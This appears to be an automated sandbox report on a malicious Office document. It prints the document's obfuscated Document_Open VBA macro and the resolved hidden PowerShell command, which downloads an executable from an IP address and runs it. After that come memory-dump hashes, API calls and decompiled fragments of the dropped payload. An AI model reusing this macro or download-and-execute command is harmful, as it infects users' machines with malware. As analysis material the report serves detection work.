8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_Open, APIs: 2, Strings: 3, Number of lines: 5, Relevance: 16.005

APIs	Meta Information
Run	IWshShell3.Run("powershell -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/RFL_0769002.exe" -Destination "C:\Users\Public\Documents\nothinglittle.exe";C:\Users\Public\Documents\nothinglittle.exe") -> 0
Chr

Strings	Decrypted Strings
"powers"
"hell"
"wscript.s"

Line	Instruction	Meta Information
9	Private Sub Document_Open()
10	insidewith = "powers"	executed
11	calllife = "hell"
12	rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))	IWshShell3.Run("powershell -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/RFL_0769002.exe" -Destination "C:\Users\Public\Documents\nothinglittle.exe";C:\Users\Public\Documents\nothinglittle.exe") -> 0 Chr executed
13	End Sub

Reset < >

Analysis Process: powershell.exe PID: 4220 Parent PID: 3664 powershell.exeCOMMON

Executed Functions

Function 031AD006, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.281300252.00000000031AD000.00000040.00000001.sdmp, Offset: 031AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 556a983790191b0ae0df7662971fb26b7ca537e4a1dd1d5995ff38ed55877336
Instruction ID: 3b2df74bf5a9559f2b261f6a83ec950b65e90cd1c0141bb0536ef1eb8d2b0c75
Opcode Fuzzy Hash: 556a983790191b0ae0df7662971fb26b7ca537e4a1dd1d5995ff38ed55877336
Instruction Fuzzy Hash: 7A01CC6100CBC05FD7138B259D94762BFA8EF43220F0D84DBE8848F693C2685C44DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 031AD01D, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.281300252.00000000031AD000.00000040.00000001.sdmp, Offset: 031AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5231123ab3071e0a3fa9d66bfc7b5a8451ee0f6a5715f069bec202fa15b35550
Instruction ID: ecd6ea03d5b2ba4ea1a8d889dbd76d765cab35144bfa299617f8ea589e31283c
Opcode Fuzzy Hash: 5231123ab3071e0a3fa9d66bfc7b5a8451ee0f6a5715f069bec202fa15b35550
Instruction Fuzzy Hash: 01014734504F809BD7108E29E98077BFBC8EF45224F188469EC081B642C3799841DAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: nothinglittle.exe PID: 6988 Parent PID: 4220 nothinglittle.exeCOMMON

Executed Functions

Function 03021120, Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0302115E

Memory Dump Source

Source File: 00000009.00000002.433813111.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e8f289c6791539496b517ccbbf057fa463d316e978006082a87a37b954fc55d5
Instruction ID: 23f8f99e7be73e2984b9c701923c26231a8102255defadc4bee821a822d6bc64
Opcode Fuzzy Hash: e8f289c6791539496b517ccbbf057fa463d316e978006082a87a37b954fc55d5
Instruction Fuzzy Hash: 10111534A00214CFDB58DF68C558A9EBBF2AF8D714F2000A9E402EB360CB759D40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 059DF528, Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

W b, xrefs: 059DF6A7

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID: W b
API String ID: 0-1316484958
Opcode ID: ed7f6d44ae45ba7c3ff1e175108bf7be981dff3c580119397a1d904df6dd54c4
Instruction ID: 179fefd6002642d359a6f555de333f323d7096df65cee1d5d81cb33fafa02462
Opcode Fuzzy Hash: ed7f6d44ae45ba7c3ff1e175108bf7be981dff3c580119397a1d904df6dd54c4
Instruction Fuzzy Hash: E461CE74D05208DFDB14CFA9E585AEDFBF6BB89304F24D52AD80AAB265DB305841CF20

Uniqueness

Uniqueness Score: -1.00%

Function 059D6B28, Relevance: 1.0, Instructions: 1020COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e07b7918f002ea1bdfa48b4109f525e7d67efc6b4616e5e4bd997cfe031e5397
Instruction ID: d25e3cd9b6a799d300774bb96115d82c6e8bc42b68dd71d985209f439248136e
Opcode Fuzzy Hash: e07b7918f002ea1bdfa48b4109f525e7d67efc6b4616e5e4bd997cfe031e5397
Instruction Fuzzy Hash: 8BB2B275E00228DFDB65CF69C980B99BBB2FF89304F1481E9D509AB265DB319E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 03021785, Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.433813111.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b95ffb895abdf52b7a808f76c4ec57d029c5aaf54eb8cdf6f1a858a552d241a0
Instruction ID: 165e077a0b65dfdff39d4c3b8784efb3d939d27d758f25f46bed0ee38810e8f8
Opcode Fuzzy Hash: b95ffb895abdf52b7a808f76c4ec57d029c5aaf54eb8cdf6f1a858a552d241a0
Instruction Fuzzy Hash: 33917CB0E012458FDB49DFBAE85469EBBF6EF99304F14C579C0049B269EB745846CF40

Uniqueness

Uniqueness Score: -1.00%

Function 030217B0, Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.433813111.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fabd3016efc978951f29b2ea8036d48e36ed77a4fd95396e3a796f3aae0c4f78
Instruction ID: 2719df4e9bdb609795490af301ff68b325e11a8943a33f3323b319074c0a7b35
Opcode Fuzzy Hash: fabd3016efc978951f29b2ea8036d48e36ed77a4fd95396e3a796f3aae0c4f78
Instruction Fuzzy Hash: 2181F9B0E012498FD749DFBBE85569EBBF6EF99304F14C529C0089B268EB7458868F50

Uniqueness

Uniqueness Score: -1.00%

Function 0302FD30, Relevance: 1.6, APIs: 1, Instructions: 107fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0302FE06

Memory Dump Source

Source File: 00000009.00000002.433813111.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: af0796b65258bbd070f8b973f00e87820ae4350219568ef4982f9b5486beed76
Instruction ID: 5ac324b1acfff34017428c96369c97431c6a2b016be0374bff9a0366d66b410c
Opcode Fuzzy Hash: af0796b65258bbd070f8b973f00e87820ae4350219568ef4982f9b5486beed76
Instruction Fuzzy Hash: B941B9B4D012599FCF10CFAAD484AEEFBF1BB49314F14806AE458B7261D734AA85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0302F880, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0302F924

Memory Dump Source

Source File: 00000009.00000002.433813111.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9630a3791a7b1cc2659d8fe92e669bb4cb88d3a797a4a1d3a84b009267c7f2dc
Instruction ID: 99713876bf451e763c9758e594444fc5f0b63468d15da6a091b33f9b68999719
Opcode Fuzzy Hash: 9630a3791a7b1cc2659d8fe92e669bb4cb88d3a797a4a1d3a84b009267c7f2dc
Instruction Fuzzy Hash: BF3198B8E01258AFCF10CFA9D980AEEFBB1BF49314F14942AE815B7210D775A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0302FB50, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0302FBCE

Memory Dump Source

Source File: 00000009.00000002.433813111.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 11dc39e8b759cf8097eaf84519f302d5f1befbc84ac35df71b549ef919bc0245
Instruction ID: 567a0150345a69aa31514e84e4564c5f01cbd9d77090d494db99845e09860a29
Opcode Fuzzy Hash: 11dc39e8b759cf8097eaf84519f302d5f1befbc84ac35df71b549ef919bc0245
Instruction Fuzzy Hash: 1231A9B4D012589FCF14CFA9D985AAEFBB5BB49324F14842AE815B7300D774A941CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 03021110, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0302115E

Memory Dump Source

Source File: 00000009.00000002.433813111.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9840c5dd0de4eef37d0ed271e330b0094d39f7b42a3ce08566c96113ff2bb006
Instruction ID: ecd59b3dc3c0b2259c68a7e5775af2b5cdaf417ddfcb32e5aad8ee55b93a0efa
Opcode Fuzzy Hash: 9840c5dd0de4eef37d0ed271e330b0094d39f7b42a3ce08566c96113ff2bb006
Instruction Fuzzy Hash: 8D111934A01214DFDB58DB68C554AEEBBF1AF89714F200169E401EB361CB759D41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0302FEC0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetQueueStatus.USER32(?), ref: 0302FEEC

Memory Dump Source

Source File: 00000009.00000002.433813111.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false

Similarity

API ID: QueueStatus
String ID:
API String ID: 611517440-0
Opcode ID: 2d06a653a7cd1f6ee1a71d0e1a0aeefa4223fa062e3e5ec14331314a14b827ad
Instruction ID: 9b263f00891ec89a3f246080c056d703f81fc052807e55d2f5f02229b2c760e7
Opcode Fuzzy Hash: 2d06a653a7cd1f6ee1a71d0e1a0aeefa4223fa062e3e5ec14331314a14b827ad
Instruction Fuzzy Hash: 7EE08C34906208EFCB14DFA4E841AADFFB8EB49340F20C0ADDC0423346C7329A52DB81

Uniqueness

Uniqueness Score: -1.00%

Function 059DFAB8, Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5ebcf31809565fcf5e004922a49095b2b3106c87c7692e719343ad568b6ac58
Instruction ID: 7c805c681dc386253a8060a81c9eaa0a5be3373a4477aaeb944a0b45abde3c04
Opcode Fuzzy Hash: b5ebcf31809565fcf5e004922a49095b2b3106c87c7692e719343ad568b6ac58
Instruction Fuzzy Hash: 33911374E05208CFDB14CFA9D995AADBBFAFF49304F209429D40AAB355DB745984CF20

Uniqueness

Uniqueness Score: -1.00%

Function 059DA200, Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2c13beeeddd105bf2e2e86948549621bf7bce3a46a401acbc5d79d7015aef3d
Instruction ID: 7e1f7124faed4c295833c98a6229fa32a1571ccac3fe58d70157006a512187fd
Opcode Fuzzy Hash: f2c13beeeddd105bf2e2e86948549621bf7bce3a46a401acbc5d79d7015aef3d
Instruction Fuzzy Hash: CF819E74E00218DFDB14DFA9D990AADBBB2FF89308F208469D405AB365DB75AC91CF50

Uniqueness

Uniqueness Score: -1.00%

Function 059D9460, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 855bd163a36aca4708508f765df24175a6ed513f9499e214d4159741fe5881cc
Instruction ID: ab8f8309ddbddbae5a4c37d373a685210c71ff198e0247e28a9b1fd9c22000fd
Opcode Fuzzy Hash: 855bd163a36aca4708508f765df24175a6ed513f9499e214d4159741fe5881cc
Instruction Fuzzy Hash: 06210770E05218CBDB14DFA6C4547EEBBB6FF85308F20952DC0196B295DB750945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 059D7C98, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cc7cc7b10f6ef9c177c8f5918eca3b81c198f451e448de50c780aff20ab9aee
Instruction ID: 991ea310d33cef87f19f7afb682f9c78fd91940ccc7393cbf3944235086cb929
Opcode Fuzzy Hash: 6cc7cc7b10f6ef9c177c8f5918eca3b81c198f451e448de50c780aff20ab9aee
Instruction Fuzzy Hash: 4101BB70E4960C9FCB54EFF694447ADFBFDFB89200F14D8A5841993351EA749A40DB21

Uniqueness

Uniqueness Score: -1.00%

Function 059DF800, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14365bd05dafd1db3c2a6d4c5753fc695c23babe0b3ac7f20b7a95488950565d
Instruction ID: c94a9678ca3f77cbd6c1631139e120c7536fb63b9cca158901253c6f08014f45
Opcode Fuzzy Hash: 14365bd05dafd1db3c2a6d4c5753fc695c23babe0b3ac7f20b7a95488950565d
Instruction Fuzzy Hash: 68E0C274E05208EFCB50DFA9E549A9CBBF8BB48300F10C1A9D81A93320D634AA40CF41

Uniqueness

Uniqueness Score: -1.00%

Function 059DA1B0, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d127ed4c3c366abefcc005e37d1340efdac2bb4fa37cd0a460a6078757ff7bb
Instruction ID: e7efefbc873644f2bd9f704bba926b42fa822223a9844d59ea01abf6d1c0ca17
Opcode Fuzzy Hash: 8d127ed4c3c366abefcc005e37d1340efdac2bb4fa37cd0a460a6078757ff7bb
Instruction Fuzzy Hash: 01E0E574E05208EFCB54DFA8D5456ACFBF9FB48304F10C0AA881893340D6359A11CF41

Uniqueness

Uniqueness Score: -1.00%

Function 059DF4D8, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d127ed4c3c366abefcc005e37d1340efdac2bb4fa37cd0a460a6078757ff7bb
Instruction ID: d98fa75ca818b92271e74e4a48caf9497b382c7f46efb7a2afa2fecb02949ecd
Opcode Fuzzy Hash: 8d127ed4c3c366abefcc005e37d1340efdac2bb4fa37cd0a460a6078757ff7bb
Instruction Fuzzy Hash: D1E0C274E05208EFCB54DFA8D445AACFBF8EB88304F20C0AA881993340D6359A42CF41

Uniqueness

Uniqueness Score: -1.00%

Function 059DFF98, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a6a167486dbc18098933521ae00890383ac6053f9711c4928fd86fe2078d81
Instruction ID: a6f721d77f71986e5cd9c1fa2ace7cd9d7b1e27b15476ad1cad7773d8c63b6ad
Opcode Fuzzy Hash: 06a6a167486dbc18098933521ae00890383ac6053f9711c4928fd86fe2078d81
Instruction Fuzzy Hash: 80E0C275A0620CEBCB10FFF4D40969EBBECEB45304F10C0A9C405A7114EF311A04DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 059DFA28, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d570fb3e64051c230856303d634753979032c6de379016e71537f956bb144c5
Instruction ID: a2d124d6bcbfd63df49d6e15c621255e0d954c27f97f13cb4871c0379f679b97
Opcode Fuzzy Hash: 1d570fb3e64051c230856303d634753979032c6de379016e71537f956bb144c5
Instruction Fuzzy Hash: 1DE0EC75A0610CEBCB14EFF4D50969EBAECAB45204F1085A9C44697114EE365A04DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 059D6AD8, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be378faa8ba7b3e96fe88601dc0511379178b28972db7f5f1fcd7894bdef2b09
Instruction ID: 483f4869ec1420c2f690242cecc74d55842c095176eaa6244499d9c04a6635ec
Opcode Fuzzy Hash: be378faa8ba7b3e96fe88601dc0511379178b28972db7f5f1fcd7894bdef2b09
Instruction Fuzzy Hash: A0E08C71A01208EBC710EFF0D40969EBBACEB49204F20C0A9C84993124EF325A00DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 059DF850, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21e5a5bca92296df0cd8c2f5de8a8bf6c915683927ff1bbaae7b70910fd34b4d
Instruction ID: f05ce635d2121f7c2727c9fc9c62803db37aba0432c985aa36d2a63f355216bd
Opcode Fuzzy Hash: 21e5a5bca92296df0cd8c2f5de8a8bf6c915683927ff1bbaae7b70910fd34b4d
Instruction Fuzzy Hash: 38E0EC70D16208EFCB54EFB9D54569CBFB9BB05345F6084ADC84A93244E7359A80CB52

Uniqueness

Uniqueness Score: -1.00%

Function 059DFA78, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14658c56c1150dd9883c244a8303af7495932b3a9b447fe6aed8eaebbd745229
Instruction ID: af874343b716a8aaf613a6576f98212b52de6b4ece76ca6c1a32b14740dac203
Opcode Fuzzy Hash: 14658c56c1150dd9883c244a8303af7495932b3a9b447fe6aed8eaebbd745229
Instruction Fuzzy Hash: 95E0EC34909209DFCB14DFA4E5469ACFBB9AB45304F60C5ADCC0917345DA325A42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 059D7BE8, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfc96fe92e02b67548b241fc0c57cc7e5c980f8b91de31ab9feb36e86398aa26
Instruction ID: 11c0782be09a0b15564ed1b8c3c185cbfe18aec2ba64ac5b5b0f29acc0bb9031
Opcode Fuzzy Hash: dfc96fe92e02b67548b241fc0c57cc7e5c980f8b91de31ab9feb36e86398aa26
Instruction Fuzzy Hash: A9D05E30509108DFC714CFA4D501B69FBACEB45204F10C49DC80943341CA339D41CB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 059DEEA0, Relevance: .5, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0757dfc30ee5d4956c0c07d68f113a9a5b8db403dcb5e9e5087a9b8c3230e84b
Instruction ID: b08bcc398f615cbcac5a2c50199f8e8f1a59b9a6fbdb74543a4df25b4aad9a37
Opcode Fuzzy Hash: 0757dfc30ee5d4956c0c07d68f113a9a5b8db403dcb5e9e5087a9b8c3230e84b
Instruction Fuzzy Hash: 3622C071E006199BDB58CFAAC981A9DFBF2FF88304F24C169D419EB219D734A946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 03021C28, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.433813111.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0c513a8d008c93b53f75fa6f04b708bafea3c980676b426328d7519b5db4be3
Instruction ID: b5db4c55514ca1b5d972c30bf6d963569c1e2259616870269394ba4976b43c2b
Opcode Fuzzy Hash: f0c513a8d008c93b53f75fa6f04b708bafea3c980676b426328d7519b5db4be3
Instruction Fuzzy Hash: 84513675D056288BEB6CCF2B8D456CAFAF7AFC9300F54C1EA991CA6254DB700A818F40

Uniqueness

Uniqueness Score: -1.00%

Function 03021500, Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.433813111.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8916b0d41acd6f140699257a5fd14527571f498411955be75349068a86e0e609
Instruction ID: b74f081fa4bd63d1e6c2bb9eb66bdd508257af7ff81b4fc13bb7722d4b7d443b
Opcode Fuzzy Hash: 8916b0d41acd6f140699257a5fd14527571f498411955be75349068a86e0e609
Instruction Fuzzy Hash: 604100B4D05269CFDB10CFA9C984AAEFFF1BB09354F24812AE815BB250D7749885CF84

Uniqueness

Uniqueness Score: -1.00%

Function 03021C18, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.433813111.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9b9ec58e8175f15ed17e85f1fa6cd1e4fc604d3e90bdf1a847279efeb070fef
Instruction ID: 528d5931da7681ae41e35834c3cfc9e98339cdfb196df94a8d8aaa5fc90de625
Opcode Fuzzy Hash: a9b9ec58e8175f15ed17e85f1fa6cd1e4fc604d3e90bdf1a847279efeb070fef
Instruction Fuzzy Hash: B5512371D056198BEB6CCF2B8D456DAFAF7AFC9300F54C1FA991CA6254DB700A868F40

Uniqueness

Uniqueness Score: -1.00%

Function 059D0006, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 914cff2b5bedbfec799be190927cd451391e357a29e2bd588730e316be73aed4
Instruction ID: b684bc2b37e39517da1ad5f2ec038b49b399e3f4b4334a6339772a2b0bca319e
Opcode Fuzzy Hash: 914cff2b5bedbfec799be190927cd451391e357a29e2bd588730e316be73aed4
Instruction Fuzzy Hash: 6F41BAB1D056588BEB19CF6BCC54389BBF2AF89204F04C1EAC44CAA265DB7419858F51

Uniqueness

Uniqueness Score: -1.00%

Function 059D0040, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 264e19937547747dbad8e18d709aa9e246b1d17c843231ec12c5b2e21107f072
Instruction ID: 389bd504061e61a4c11435663ae845ab969ee481c28f71cbe1eac88dd725ee7a
Opcode Fuzzy Hash: 264e19937547747dbad8e18d709aa9e246b1d17c843231ec12c5b2e21107f072
Instruction Fuzzy Hash: 164155B1D056288BEB68CF5BC944789FAF7EFC8304F04C1A9C40CA6254EB791A858F50

Uniqueness

Uniqueness Score: -1.00%

Function 059DA4A8, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.436995179.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cb306b3081f158c03fcc247a6efc779bb0106237fb741b9cb4a8904228636dd
Instruction ID: 0d7e3243453eca6ae128bd8a7e42626490b4523cc2cf90adbcba762325f3e220
Opcode Fuzzy Hash: 3cb306b3081f158c03fcc247a6efc779bb0106237fb741b9cb4a8904228636dd
Instruction Fuzzy Hash: 0E318771D056298BDB19CF6BD84469DFAFBBFC8340F04C1BAD419A6254DB740A418F10

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: nothinglittle.exe PID: 6172 Parent PID: 6988 nothinglittle.exeCOMMON

Executed Functions

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e13
0x00419e1f
0x00419e27
0x00419e32
0x00419e4d
0x00419e55
0x00419e59

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E32, 00419E40
BMA, xrefs: 00419E4D, 00419E54

Memory Dump Source

Source File: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D5A, Relevance: 1.5, APIs: 1, Instructions: 42
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00419D5A(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;
				void* _t33;

				asm("lodsd");
				asm("aas");
				asm("sbb eax, 0xec8b5539");
				_t17 = _a4;
				_t3 = _t17 + 0xc40; // 0xc40
				E0041A960(_t33, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}

0x00419d5a
0x00419d5b
0x00419d5e
0x00419d63
0x00419d6f
0x00419d77
0x00419dad
0x00419db1

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6b97a3953c1a83f53d72e5c861b38b15ff57c4cf81a703307256ba1b6eb43e6d
Instruction ID: 92c2d68909df4bc7bd2149faf843854d3223713b586296fdba58bb900926941b
Opcode Fuzzy Hash: 6b97a3953c1a83f53d72e5c861b38b15ff57c4cf81a703307256ba1b6eb43e6d
Instruction Fuzzy Hash: 0B01BDB6211108ABCB08CF89DD84EEB37A9EF8C754F158649FA0DA7241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
